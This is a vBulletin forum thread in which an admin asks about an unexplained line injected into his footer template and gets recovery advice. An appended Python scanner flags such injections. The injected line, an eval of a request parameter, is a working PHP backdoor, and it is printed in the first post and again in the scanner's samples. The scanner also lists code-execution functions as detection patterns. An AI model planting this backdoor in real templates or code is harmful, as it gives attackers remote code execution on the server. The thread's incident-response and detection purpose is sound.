hacking attempt? Modified template
Amenadiel
03-13-2011, 11:31 PM
My footer templates just got a new line:
<script type=\"text/javascript\">
<!-- // Main vBulletin Javascript Initialization
vBulletin_init();
{${eval($_REQUEST[dar])}}
//-->
</script>
I know I didn't insert that line in red. I haven't seen how this is exploited, and I can't explain how they inserted this line in my templates.
BirdOPrey5
03-14-2011, 11:53 AM
Well, change your passwords (all admin accounts and your MySQL password)...
Run the suspect files check to see if any files have been altered...
How many mods do you have, could be an exploit in a mod?
Are you running at least 3.8.5?
Check out this article for securing your forums:
https://vborg.vbsupport.ru/showthread.php?t=193930
You could ask your host to check the logs to see if they can see how you were hacked; some hosts are more cooperative than others.
Amenadiel
03-14-2011, 04:49 PM
Yep, I'm onto that, I just can't understand what's done with the "extra code".
Is it even possible to get REQUEST vars from a template? I believe it isn't, you must pass through a plugin to do that.
BirdOPrey5
03-14-2011, 04:56 PM
I'm not really sure about $_REQUEST but if it's a valid PHP variable I don't see why it wouldn't work... I use $_SERVER['HTTP_HOST'] all the time in templates.
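Added example, not part of the thread and not vBulletin's own code: a small Python scanner for exported template bodies that flags the kind of line shown in the first post. It relies on vBulletin 3.x evaluating compiled templates as PHP double-quoted strings; the function names, severity labels and the two sample templates other than the footer are assumptions made for illustration.

```python
import re

# vBulletin 3.x evaluates a compiled template as a PHP double-quoted string,
# so "{${expr}}" in a template makes PHP run expr each time the page renders.
COMPLEX_EXPR = re.compile(r"\$\{(?P<expr>[^{}]*\([^{}]*\)[^{}]*)\}")
CODE_EXEC = re.compile(
    r"\b(eval|assert|system|exec|passthru|shell_exec|popen|proc_open|"
    r"create_function|base64_decode)\s*\(", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")


def scan_template(body):
    """Return (line_number, severity, detail) findings for one template body."""
    findings = []
    for lineno, line in enumerate(body.splitlines(), start=1):
        hits = [m.group("expr").strip() for m in COMPLEX_EXPR.finditer(line)]
        for expr in hits:
            severity = "high" if CODE_EXEC.search(expr) else "medium"
            findings.append((lineno, severity, "call inside ${...}: " + expr))
        if not hits and REQUEST_INPUT.search(line):
            findings.append((lineno, "review", "request input referenced"))
    return findings


def scan_all(templates):
    """Map template title -> findings, omitting clean templates."""
    scanned = {title: scan_template(body) for title, body in templates.items()}
    return {title: found for title, found in scanned.items() if found}


# Constructed sample export: "footer" is the snippet from the first post,
# the other two are made-up templates for comparison.
SAMPLE_TEMPLATES = {
    "footer": r'''<script type=\"text/javascript\">
<!-- // Main vBulletin Javascript Initialization
vBulletin_init();
{${eval($_REQUEST[dar])}}
//-->
</script>''',
    "header": r'''<a href=\"http://$_SERVER[HTTP_HOST]/\">$vboptions[bbtitle]</a>''',
    "custom_block": r'''<div>Hello $_REQUEST[name]</div>''',
}

if __name__ == "__main__":
    for title, findings in scan_all(SAMPLE_TEMPLATES).items():
        for lineno, severity, detail in findings:
            print(f"{title}:{lineno} [{severity}] {detail}")
```

A "review" finding is not proof of tampering; it marks a template that reads request input directly and should be compared against the stock version.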